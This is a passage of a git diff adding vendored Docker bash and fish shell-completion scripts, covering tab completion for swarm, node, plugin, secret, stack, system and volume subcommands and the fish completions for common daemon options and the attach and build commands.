--no-resolve --no-trunc --quiet -q" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--filter|-f') + if [ $cword -eq $counter ]; then + __docker_complete_services + fi + ;; + esac +} + +_docker_service_update() { + local $subcommand="${words[$subcommand_pos]}" + + local options_with_args=" + --constraint + --endpoint-mode + --env -e + --force + --health-cmd + --health-interval + --health-retries + --health-timeout + --hostname + --label -l + --limit-cpu + --limit-memory + --log-driver + --log-opt + --mount + --network + --no-healthcheck + --replicas + --reserve-cpu + --reserve-memory + --restart-condition + --restart-delay + --restart-max-attempts + --restart-window + --rollback + --stop-grace-period + --update-delay + --update-failure-action + --update-max-failure-ratio + --update-monitor + --update-parallelism + --user -u + --workdir -w + " + + local boolean_options=" + --help + --tty -t + --with-registry-auth + " + + __docker_complete_log_driver_options && return + + if [ "$subcommand" = "create" ] ; then + options_with_args="$options_with_args + --container-label + --dns + --dns-option + --dns-search + --env-file + --group + --host + --mode + --name + --publish -p + --secret + " + + case "$prev" in + --env-file) + _filedir + return + ;; + --host) + case "$cur" in + *:) + __docker_complete_resolved_hostname + return + ;; + esac + ;; + --mode) + COMPREPLY=( $( compgen -W "global replicated" -- "$cur" ) ) + return + ;; + --secret) + __docker_complete_secrets + return + ;; + --group) + COMPREPLY=( $(compgen -g -- "$cur") ) + return + ;; + esac + fi + if [ "$subcommand" = "update" ] ; then + options_with_args="$options_with_args + --arg + --container-label-add + --container-label-rm + --dns-add + --dns-option-add + --dns-option-rm + --dns-rm + --dns-search-add + --dns-search-rm + --group-add + --group-rm + --host-add + --host-rm + --image + --publish-add + --publish-rm + --secret-add + --secret-rm + " + + case "$prev" in + --group-add) + COMPREPLY=( $(compgen -g -- "$cur") ) + return + ;; + --group-rm) + COMPREPLY=( $(compgen -g -- "$cur") ) + return + ;; + --host-add|--host-rm) + case "$cur" in + *:) + __docker_complete_resolved_hostname + return + ;; + esac + ;; + --image) + __docker_complete_image_repos_and_tags + return + ;; + --secret-add|--secret-rm) + __docker_complete_secrets + return + ;; + esac + fi + + case "$prev" in + --endpoint-mode) + COMPREPLY=( $( compgen -W "dnsrr vip" -- "$cur" ) ) + return + ;; + --env|-e) + # we do not append a "=" here because "-e VARNAME" is legal systax, too + COMPREPLY=( $( compgen -e -- "$cur" ) ) + __docker_nospace + return + ;; + --log-driver) + __docker_complete_log_drivers + return + ;; + --log-opt) + __docker_complete_log_options + return + ;; + --network) + __docker_complete_networks + return + ;; + --restart-condition) + COMPREPLY=( $( compgen -W "any none on-failure" -- "$cur" ) ) + return + ;; + --user|-u) + __docker_complete_user_group + return + ;; + $(__docker_to_extglob "$options_with_args") ) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "$boolean_options $options_with_args" -- "$cur" ) ) + ;; + *) + local counter=$( __docker_pos_first_nonflag $( __docker_to_alternatives "$options_with_args" ) ) + if [ "$subcommand" = "update" ] ; then + if [ $cword -eq $counter ]; then + __docker_complete_services + fi + else + if [ $cword -eq $counter ]; then + __docker_complete_images + fi + fi + ;; + esac +} + +_docker_swarm() { + local subcommands=" + init + join + join-token + leave + unlock + unlock-key + update + " + __docker_subcommands "$subcommands" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_swarm_init() { + case "$prev" in + --advertise-addr) + if [[ $cur == *: ]] ; then + COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) + else + __docker_complete_local_interfaces + __docker_nospace + fi + return + ;; + --availability) + COMPREPLY=( $( compgen -W "active drain pause" -- "$cur" ) ) + return + ;; + --cert-expiry|--dispatcher-heartbeat|--external-ca|--max-snapshots|--snapshot-interval|--task-history-limit) + return + ;; + --listen-addr) + if [[ $cur == *: ]] ; then + COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) + else + __docker_complete_local_interfaces --add 0.0.0.0 + __docker_nospace + fi + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--advertise-addr --autolock --availability --cert-expiry --dispatcher-heartbeat --external-ca --force-new-cluster --help --listen-addr --max-snapshots --snapshot-interval --task-history-limit" -- "$cur" ) ) + ;; + esac +} + +_docker_swarm_join() { + case "$prev" in + --advertise-addr) + if [[ $cur == *: ]] ; then + COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) + else + __docker_complete_local_interfaces + __docker_nospace + fi + return + ;; + --listen-addr) + if [[ $cur == *: ]] ; then + COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) + else + __docker_complete_local_interfaces --add 0.0.0.0 + __docker_nospace + fi + return + ;; + --token) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--advertise-addr --help --listen-addr --token" -- "$cur" ) ) + ;; + *:) + COMPREPLY=( $( compgen -W "2377" -- "${cur##*:}" ) ) + ;; + esac +} + +_docker_swarm_join-token() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --quiet -q --rotate" -- "$cur" ) ) + ;; + *) + local counter=$( __docker_pos_first_nonflag ) + if [ $cword -eq $counter ]; then + COMPREPLY=( $( compgen -W "manager worker" -- "$cur" ) ) + fi + ;; + esac +} + +_docker_swarm_leave() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) + ;; + esac +} + +_docker_swarm_unlock() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + esac +} + +_docker_swarm_unlock-key() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --quiet -q --rotate" -- "$cur" ) ) + ;; + esac +} + +_docker_swarm_update() { + case "$prev" in + --cert-expiry|--dispatcher-heartbeat|--external-ca|--max-snapshots|--snapshot-interval|--task-history-limit) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--autolock --cert-expiry --dispatcher-heartbeat --external-ca --help --max-snapshots --snapshot-interval --task-history-limit" -- "$cur" ) ) + ;; + esac +} + +_docker_node() { + local subcommands=" + demote + inspect + ls list + promote + rm remove + ps + update + " + __docker_subcommands "$subcommands" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_node_demote() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + __docker_complete_nodes --filter role=manager + esac +} + +_docker_node_inspect() { + case "$prev" in + --format|-f) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--format -f --help --pretty" -- "$cur" ) ) + ;; + *) + __docker_complete_nodes_plus_self + esac +} + +_docker_node_list() { + _docker_node_ls +} + +_docker_node_ls() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + id) + __docker_complete_nodes --cur "${cur##*=}" --id + return + ;; + name) + __docker_complete_nodes --cur "${cur##*=}" --name + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -W "id label name" -S = -- "$cur" ) ) + __docker_nospace + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) ) + ;; + esac +} + +_docker_node_promote() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + __docker_complete_nodes --filter role=worker + esac +} + +_docker_node_remove() { + _docker_node_rm +} + +_docker_node_rm() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) + ;; + *) + __docker_complete_nodes + esac +} + +_docker_node_ps() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + desired-state) + COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) ) + return + ;; + name) + __docker_complete_services --cur "${cur##*=}" --name + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -W "desired-state id label name" -S = -- "$cur" ) ) + __docker_nospace + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter -f --help --no-resolve --no-trunc" -- "$cur" ) ) + ;; + *) + __docker_complete_nodes_plus_self + ;; + esac +} + +_docker_node_update() { + case "$prev" in + --availability) + COMPREPLY=( $( compgen -W "active drain pause" -- "$cur" ) ) + return + ;; + --role) + COMPREPLY=( $( compgen -W "manager worker" -- "$cur" ) ) + return + ;; + --label-add|--label-rm) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--availability --help --label-add --label-rm --role" -- "$cur" ) ) + ;; + *) + __docker_complete_nodes + esac +} + +_docker_pause() { + _docker_container_pause +} + +_docker_plugin() { + local subcommands=" + create + disable + enable + inspect + install + ls + push + rm + set + " + local aliases=" + list + remove + " + __docker_subcommands "$subcommands $aliases" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_plugin_create() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--compress --help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + # reponame + return + elif [ $cword -eq $((counter + 1)) ]; then + _filedir -d + fi + ;; + esac +} + +_docker_plugin_disable() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_plugins_installed + fi + ;; + esac +} + +_docker_plugin_enable() { + case "$prev" in + --timeout) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --timeout" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--timeout') + if [ $cword -eq $counter ]; then + __docker_complete_plugins_installed + fi + ;; + esac +} + +_docker_plugin_inspect() { + case "$prev" in + --format|f) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) + ;; + *) + __docker_complete_plugins_installed + ;; + esac +} + +_docker_plugin_install() { + case "$prev" in + --alias) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--alias --disable --disable-content-trust=false --grant-all-permissions --help" -- "$cur" ) ) + ;; + esac +} + +_docker_plugin_list() { + _docker_plugin_ls +} + +_docker_plugin_ls() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --no-trunc" -- "$cur" ) ) + ;; + esac +} + +_docker_plugin_push() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_plugins_installed + fi + ;; + esac +} + +_docker_plugin_remove() { + _docker_plugin_rm +} + +_docker_plugin_rm() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) + ;; + *) + __docker_complete_plugins_installed + ;; + esac +} + +_docker_plugin_set() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_plugins_installed + fi + ;; + esac +} + + +_docker_port() { + _docker_container_port +} + +_docker_ps() { + _docker_container_ls +} + +_docker_pull() { + _docker_image_pull +} + +_docker_push() { + _docker_image_push +} + +_docker_rename() { + _docker_container_rename +} + +_docker_restart() { + _docker_container_restart +} + +_docker_rm() { + _docker_container_rm +} + +_docker_rmi() { + _docker_image_rm +} + +_docker_run() { + _docker_container_run +} + +_docker_save() { + _docker_image_save +} + + +_docker_secret() { + local subcommands=" + create + inspect + ls + rm + " + local aliases=" + list + remove + " + __docker_subcommands "$subcommands $aliases" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_secret_create() { + case "$prev" in + --label|-l) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --label -l" -- "$cur" ) ) + ;; + esac +} + +_docker_secret_inspect() { + case "$prev" in + --format|-f) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) + ;; + *) + __docker_complete_secrets + ;; + esac +} + +_docker_secret_list() { + _docker_secret_ls +} + +_docker_secret_ls() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --quiet -q" -- "$cur" ) ) + ;; + esac +} + +_docker_secret_remove() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + __docker_complete_secrets + ;; + esac +} + +_docker_secret_rm() { + _docker_secret_remove +} + + + +_docker_search() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + is-automated) + COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) + return + ;; + is-official) + COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) ) + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -S = -W "is-automated is-official stars" -- "$cur" ) ) + __docker_nospace + return + ;; + --limit) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter --help --limit --no-trunc" -- "$cur" ) ) + ;; + esac +} + + +_docker_stack() { + local subcommands=" + deploy + ls + ps + rm + services + " + local aliases=" + down + list + remove + up + " + __docker_subcommands "$subcommands $aliases" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_stack_deploy() { + case "$prev" in + --bundle-file) + if __docker_is_experimental ; then + _filedir dab + return + fi + ;; + --compose-file|-c) + _filedir yml + return + ;; + esac + + case "$cur" in + -*) + local options="--compose-file -c --help --with-registry-auth" + __docker_is_experimental && options+=" --bundle-file" + COMPREPLY=( $( compgen -W "$options" -- "$cur" ) ) + ;; + esac +} + +_docker_stack_down() { + _docker_stack_rm +} + +_docker_stack_list() { + _docker_stack_ls +} + +_docker_stack_ls() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + esac +} + +_docker_stack_ps() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + desired-state) + COMPREPLY=( $( compgen -W "accepted running" -- "${cur##*=}" ) ) + return + ;; + id) + __docker_complete_stacks --cur "${cur##*=}" --id + return + ;; + name) + __docker_complete_stacks --cur "${cur##*=}" --name + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -S = -W "id name desired-state" -- "$cur" ) ) + __docker_nospace + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--all -a --filter -f --help --no-resolve --no-trunc" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--filter|-f') + if [ $cword -eq $counter ]; then + __docker_complete_stacks + fi + ;; + esac +} + +_docker_stack_remove() { + _docker_stack_rm +} + +_docker_stack_rm() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag) + if [ $cword -eq $counter ]; then + __docker_complete_stacks + fi + ;; + esac +} + +_docker_stack_services() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + id) + __docker_complete_services --cur "${cur##*=}" --id + return + ;; + label) + return + ;; + name) + __docker_complete_services --cur "${cur##*=}" --name + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -S = -W "id label name" -- "$cur" ) ) + __docker_nospace + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter -f --help --quiet -q" -- "$cur" ) ) + ;; + *) + local counter=$(__docker_pos_first_nonflag '--filter|-f') + if [ $cword -eq $counter ]; then + __docker_complete_stacks + fi + ;; + esac +} + +_docker_stack_up() { + _docker_stack_deploy +} + + +_docker_start() { + _docker_container_start +} + +_docker_stats() { + _docker_container_stats +} + +_docker_stop() { + _docker_container_stop +} + + +_docker_system() { + local subcommands=" + df + events + info + prune + " + __docker_subcommands "$subcommands $aliases" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_system_df() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help --verbose -v" -- "$cur" ) ) + ;; + esac +} + +_docker_system_events() { + local key=$(__docker_map_key_of_current_option '-f|--filter') + case "$key" in + container) + __docker_complete_containers_all --cur "${cur##*=}" + return + ;; + daemon) + local name=$(__docker_q info | sed -n 's/^\(ID\|Name\): //p') + COMPREPLY=( $( compgen -W "$name" -- "${cur##*=}" ) ) + return + ;; + event) + COMPREPLY=( $( compgen -W " + attach + commit + connect + copy + create + delete + destroy + detach + die + disconnect + exec_create + exec_detach + exec_start + export + health_status + import + kill + load + mount + oom + pause + pull + push + reload + rename + resize + restart + save + start + stop + tag + top + unmount + unpause + untag + update + " -- "${cur##*=}" ) ) + return + ;; + image) + cur="${cur##*=}" + __docker_complete_images + return + ;; + network) + __docker_complete_networks --cur "${cur##*=}" + return + ;; + type) + COMPREPLY=( $( compgen -W "container daemon image network volume" -- "${cur##*=}" ) ) + return + ;; + volume) + __docker_complete_volumes --cur "${cur##*=}" + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -S = -W "container daemon event image label network type volume" -- "$cur" ) ) + __docker_nospace + return + ;; + --since|--until) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter -f --help --since --until --format" -- "$cur" ) ) + ;; + esac +} + +_docker_system_info() { + case "$prev" in + --format|-f) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) + ;; + esac +} + +_docker_system_prune() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--all -a --force -f --help" -- "$cur" ) ) + ;; + esac +} + + +_docker_tag() { + _docker_image_tag +} + +_docker_unpause() { + _docker_container_unpause +} + +_docker_update() { + _docker_container_update +} + +_docker_top() { + _docker_container_top +} + +_docker_version() { + case "$prev" in + --format|-f) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) + ;; + esac +} + +_docker_volume_create() { + case "$prev" in + --driver|-d) + __docker_complete_plugins_bundled --type Volume + return + ;; + --label|--opt|-o) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--driver -d --help --label --opt -o" -- "$cur" ) ) + ;; + esac +} + +_docker_volume_inspect() { + case "$prev" in + --format|-f) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--format -f --help" -- "$cur" ) ) + ;; + *) + __docker_complete_volumes + ;; + esac +} + +_docker_volume_ls() { + local key=$(__docker_map_key_of_current_option '--filter|-f') + case "$key" in + dangling) + COMPREPLY=( $( compgen -W "true false" -- "${cur##*=}" ) ) + return + ;; + driver) + __docker_complete_plugins_bundled --cur "${cur##*=}" --type Volume + return + ;; + name) + __docker_complete_volumes --cur "${cur##*=}" + return + ;; + esac + + case "$prev" in + --filter|-f) + COMPREPLY=( $( compgen -S = -W "dangling driver label name" -- "$cur" ) ) + __docker_nospace + return + ;; + --format) + return + ;; + esac + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--filter -f --format --help --quiet -q" -- "$cur" ) ) + ;; + esac +} + +_docker_volume_prune() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) + ;; + esac +} + +_docker_volume_rm() { + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) ) + ;; + *) + __docker_complete_volumes + ;; + esac +} + +_docker_volume() { + local subcommands=" + create + inspect + ls + prune + rm + " + __docker_subcommands "$subcommands" && return + + case "$cur" in + -*) + COMPREPLY=( $( compgen -W "--help" -- "$cur" ) ) + ;; + *) + COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) ) + ;; + esac +} + +_docker_wait() { + _docker_container_wait +} + +_docker() { + local previous_extglob_setting=$(shopt -p extglob) + shopt -s extglob + + local management_commands=( + container + image + network + node + plugin + secret + service + stack + system + volume + ) + + local top_level_commands=( + build + login + logout + run + search + version + ) + + local legacy_commands=( + commit + cp + create + diff + events + exec + export + history + images + import + info + inspect + kill + load + logs + pause + port + ps + pull + push + rename + restart + rm + rmi + save + start + stats + stop + swarm + tag + top + unpause + update + wait + ) + + local experimental_commands=( + checkpoint + deploy + ) + + local commands=(${management_commands[*]} ${top_level_commands[*]}) + [ -z "$DOCKER_HIDE_LEGACY_COMMANDS" ] && commands+=(${legacy_commands[*]}) + + # These options are valid as global options for all client commands + # and valid as command options for `docker daemon` + local global_boolean_options=" + --debug -D + --tls + --tlsverify + " + local global_options_with_args=" + --config + --host -H + --log-level -l + --tlscacert + --tlscert + --tlskey + " + + local host config + + COMPREPLY=() + local cur prev words cword + _get_comp_words_by_ref -n : cur prev words cword + + local command='docker' command_pos=0 subcommand_pos + local counter=1 + while [ $counter -lt $cword ]; do + case "${words[$counter]}" in + # save host so that completion can use custom daemon + --host|-H) + (( counter++ )) + host="${words[$counter]}" + ;; + # save config so that completion can use custom configuration directories + --config) + (( counter++ )) + config="${words[$counter]}" + ;; + $(__docker_to_extglob "$global_options_with_args") ) + (( counter++ )) + ;; + -*) + ;; + =) + (( counter++ )) + ;; + *) + command="${words[$counter]}" + command_pos=$counter + break + ;; + esac + (( counter++ )) + done + + local binary="${words[0]}" + if [[ $binary == ?(*/)dockerd ]] ; then + # for the dockerd binary, we reuse completion of `docker daemon`. + # dockerd does not have subcommands and global options. + command=daemon + command_pos=0 + fi + + local completions_func=_docker_${command} + declare -F $completions_func >/dev/null && $completions_func + + eval "$previous_extglob_setting" + return 0 +} + +eval "$__docker_previous_extglob_setting" +unset __docker_previous_extglob_setting + +complete -F _docker docker dockerd diff --git a/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish b/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish new file mode 100644 index 0000000000..2715cb1aa6 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/completion/fish/docker.fish @@ -0,0 +1,405 @@ +# docker.fish - docker completions for fish shell +# +# This file is generated by gen_docker_fish_completions.py from: +# https://github.com/barnybug/docker-fish-completion +# +# To install the completions: +# mkdir -p ~/.config/fish/completions +# cp docker.fish ~/.config/fish/completions +# +# Completion supported: +# - parameters +# - commands +# - containers +# - images +# - repositories + +function __fish_docker_no_subcommand --description 'Test if docker has yet to be given the subcommand' + for i in (commandline -opc) + if contains -- $i attach build commit cp create diff events exec export history images import info inspect kill load login logout logs pause port ps pull push rename restart rm rmi run save search start stop tag top unpause version wait stats + return 1 + end + end + return 0 +end + +function __fish_print_docker_containers --description 'Print a list of docker containers' -a select + switch $select + case running + docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS=" +"}; $5 ~ "^Up" {print $1 "\n" $(NF)}' | tr ',' '\n' + case stopped + docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS=" +"}; $5 ~ "^Exit" {print $1 "\n" $(NF)}' | tr ',' '\n' + case all + docker ps -a --no-trunc | command awk 'NR>1' | command awk 'BEGIN {FS=" +"}; {print $1 "\n" $(NF)}' | tr ',' '\n' + end +end + +function __fish_print_docker_images --description 'Print a list of docker images' + docker images | command awk 'NR>1' | command grep -v '' | command awk '{print $1":"$2}' +end + +function __fish_print_docker_repositories --description 'Print a list of docker repositories' + docker images | command awk 'NR>1' | command grep -v '' | command awk '{print $1}' | command sort | command uniq +end + +# common options +complete -c docker -f -n '__fish_docker_no_subcommand' -l api-cors-header -d "Set CORS headers in the Engine API. Default is cors disabled" +complete -c docker -f -n '__fish_docker_no_subcommand' -s b -l bridge -d 'Attach containers to a pre-existing network bridge' +complete -c docker -f -n '__fish_docker_no_subcommand' -l bip -d "Use this CIDR notation address for the network bridge's IP, not compatible with -b" +complete -c docker -f -n '__fish_docker_no_subcommand' -s D -l debug -d 'Enable debug mode' +complete -c docker -f -n '__fish_docker_no_subcommand' -s d -l daemon -d 'Enable daemon mode' +complete -c docker -f -n '__fish_docker_no_subcommand' -l dns -d 'Force Docker to use specific DNS servers' +complete -c docker -f -n '__fish_docker_no_subcommand' -l dns-opt -d 'Force Docker to use specific DNS options' +complete -c docker -f -n '__fish_docker_no_subcommand' -l dns-search -d 'Force Docker to use specific DNS search domains' +complete -c docker -f -n '__fish_docker_no_subcommand' -l exec-opt -d 'Set runtime execution options' +complete -c docker -f -n '__fish_docker_no_subcommand' -l fixed-cidr -d 'IPv4 subnet for fixed IPs (e.g. 10.20.0.0/16)' +complete -c docker -f -n '__fish_docker_no_subcommand' -l fixed-cidr-v6 -d 'IPv6 subnet for fixed IPs (e.g.: 2001:a02b/48)' +complete -c docker -f -n '__fish_docker_no_subcommand' -s G -l group -d 'Group to assign the unix socket specified by -H when running in daemon mode' +complete -c docker -f -n '__fish_docker_no_subcommand' -s g -l graph -d 'Path to use as the root of the Docker runtime' +complete -c docker -f -n '__fish_docker_no_subcommand' -s H -l host -d 'The socket(s) to bind to in daemon mode or connect to in client mode, specified using one or more tcp://host:port, unix:///path/to/socket, fd://* or fd://socketfd.' +complete -c docker -f -n '__fish_docker_no_subcommand' -s h -l help -d 'Print usage' +complete -c docker -f -n '__fish_docker_no_subcommand' -l icc -d 'Allow unrestricted inter-container and Docker daemon host communication' +complete -c docker -f -n '__fish_docker_no_subcommand' -l insecure-registry -d 'Enable insecure communication with specified registries (no certificate verification for HTTPS and enable HTTP fallback) (e.g., localhost:5000 or 10.20.0.0/16)' +complete -c docker -f -n '__fish_docker_no_subcommand' -l ip -d 'Default IP address to use when binding container ports' +complete -c docker -f -n '__fish_docker_no_subcommand' -l ip-forward -d 'Enable net.ipv4.ip_forward and IPv6 forwarding if --fixed-cidr-v6 is defined. IPv6 forwarding may interfere with your existing IPv6 configuration when using Router Advertisement.' +complete -c docker -f -n '__fish_docker_no_subcommand' -l ip-masq -d "Enable IP masquerading for bridge's IP range" +complete -c docker -f -n '__fish_docker_no_subcommand' -l iptables -d "Enable Docker's addition of iptables rules" +complete -c docker -f -n '__fish_docker_no_subcommand' -l ipv6 -d 'Enable IPv6 networking' +complete -c docker -f -n '__fish_docker_no_subcommand' -s l -l log-level -d 'Set the logging level ("debug", "info", "warn", "error", "fatal")' +complete -c docker -f -n '__fish_docker_no_subcommand' -l label -d 'Set key=value labels to the daemon (displayed in `docker info`)' +complete -c docker -f -n '__fish_docker_no_subcommand' -l mtu -d 'Set the containers network MTU' +complete -c docker -f -n '__fish_docker_no_subcommand' -s p -l pidfile -d 'Path to use for daemon PID file' +complete -c docker -f -n '__fish_docker_no_subcommand' -l registry-mirror -d 'Specify a preferred Docker registry mirror' +complete -c docker -f -n '__fish_docker_no_subcommand' -s s -l storage-driver -d 'Force the Docker runtime to use a specific storage driver' +complete -c docker -f -n '__fish_docker_no_subcommand' -l selinux-enabled -d 'Enable selinux support. SELinux does not presently support the BTRFS storage driver' +complete -c docker -f -n '__fish_docker_no_subcommand' -l storage-opt -d 'Set storage driver options' +complete -c docker -f -n '__fish_docker_no_subcommand' -l tls -d 'Use TLS; implied by --tlsverify' +complete -c docker -f -n '__fish_docker_no_subcommand' -l tlscacert -d 'Trust only remotes providing a certificate signed by the CA given here' +complete -c docker -f -n '__fish_docker_no_subcommand' -l tlscert -d 'Path to TLS certificate file' +complete -c docker -f -n '__fish_docker_no_subcommand' -l tlskey -d 'Path to TLS key file' +complete -c docker -f -n '__fish_docker_no_subcommand' -l tlsverify -d 'Use TLS and verify the remote (daemon: verify client, client: verify daemon)' +complete -c docker -f -n '__fish_docker_no_subcommand' -s v -l version -d 'Print version information and quit' + +# subcommands +# attach +complete -c docker -f -n '__fish_docker_no_subcommand' -a attach -d 'Attach to a running container' +complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l no-stdin -d 'Do not attach STDIN' +complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -l sig-proxy -d 'Proxy all received signals to the process (non-TTY mode only). SIGCHLD, SIGKILL, and SIGSTOP are not proxied.' +complete -c docker -A -f -n '__fish_seen_subcommand_from attach' -a '(__fish_print_docker_containers running)' -d "Container" + +# build +complete -c docker -f -n '__fish_docker_no_subcommand' -a build -d 'Build an image from a Dockerfile' +complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s f -l file -d "Name of the Dockerfile(Default is 'Dockerfile' at context root)" +complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l force-rm -d 'Always remove intermediate containers, even after unsuccessful builds' +complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l help -d 'Print usage' +complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l no-cache -d 'Do not use cache when building the image' +complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l pull -d 'Always attempt to pull a newer version of the image' +complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s q -l quiet -d 'Suppress the build output and print image ID on success' +complete -c docker -A -f -n '__fish_seen_subcommand_from build' -l rm -d 'Remove intermediate containers after a successful build' +complete -c docker -A -f -n '__fish_seen_subcommand_from build' -s t -l tag -d 'Repository name (and optionally a tag) to 